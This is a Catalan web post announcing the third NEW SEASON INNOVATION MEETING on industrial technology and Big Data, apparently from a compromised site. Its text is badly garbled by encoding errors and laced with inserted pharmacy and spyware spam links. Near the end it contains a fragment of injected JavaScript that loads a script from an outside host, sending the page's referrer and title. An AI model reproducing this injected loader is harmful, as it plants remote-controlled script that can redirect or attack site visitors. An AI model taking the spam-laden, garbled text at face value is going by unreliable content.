Comunicació

3a ediciA?

ISP, joves empresaris i directius industrials i ACCIAi?? us convidem a participar en la tercera jornada de NEW SEASON INNOVATION MEETING

ISP, joves empresaris i directius industrials buy pills Ai??iAi??ACCIAi??Ai?? us convidemAi?? a participar en laAi??terceraAi?? jornadaAi??deAi??NEW SEASON INNOVATION MEETINGAi??Ai?? La tercera ediciA? dai??i??aquest esdeveniment se centrarAi?? en lai??i??Ai??mbit del lesAi??tecnologies per a una indA?stria mAi??s competitiva i les oportunitats del Big data.Ai??Ai??Ai??10 centres TECNIOAi??(centres tecnolA?gics i grups de recerca avalats per la Generalitat de Catalunya)Ai??exposaran 10 solucionsAi?? per fer mAi??s competitiva la teva empresaAi??i a continuaciA? es donarAi?? pas aAi??reunions de 10 minuts cara a cara entre les empreses assistents que ho hagin solAi??licitat iAi??els representants delAi??centres TECNIO. En paralAi??lel podrAi??s gaudir dai??i??unAi??espai deAi??networkingcompartint una copa de cava. Ai?? Durant la jornada es presentarAi??Ai??Ai??EURECAT, el nou gran centre tecnolA?gicAi?? promogutAi?? per la Generalitat de Catalunya. ASCAMM, Barcelona Digital, CETEMMSA, CTM, Barcelona Media i Leitat sai??i??uneixen per formar un nou centre integratAi?? guanyant massa crAi??tica, eficiA?ncia i proximitat amb lai??i??empresa catalana. Ai??Ai??Objectiu de lai??i??acte:Ai??Ai??Lai??i??ISP, joves empresaris i directius industrialsAi??iAi??ACCIAi??Ai??ofereixen: Donar a conA?ixer a les petites i mitjanes empreses industrialsAi?? les tecnologies disponibles que les fan mAi??s competitives. Un espai deAi??networkingAi??per propiciar la transferA?ncia tecnolA?gica entre la indA?stria i els diferents sectors de creativitat innovadora. Ai??Ai??Tai??i??interessa si etsai??i??Ai??Ai?? Una petita o mitjana empresa industrial. Ai??Ai??PROGRAMA I INSCRIPCIONS http://www.kamitelco.com/2018/03/18/himalaya-confido-price-in-nepal/ Ai??Ai??Ai??InscripciA?:Ai??FORMULARI Dai??i??INSCRIPCIAi??Ai??(Inscripcions:Ai?? Fins al 22 de marAi??)Ai??Ai??Ai??MAi??s informaciA?:Ai??isp@isp.cat // 93 7450944 (Elena DAi??az)

Order order pilex cijena http://www.walkingforwater.eu/cost-of-cephalexin-at-walgreens/

online Order online

http://qidsurvey.com/?p=511

Pills

} else Order {

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { Buy online minocycline online Purchase bactrim ds generic equivalent generic for detrol order vantin dosage charboleps price http://godavaricarrentals.com/?p=7481 Buy android tracker, whatsapp spy, flexispy cheap liponexol reviews

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *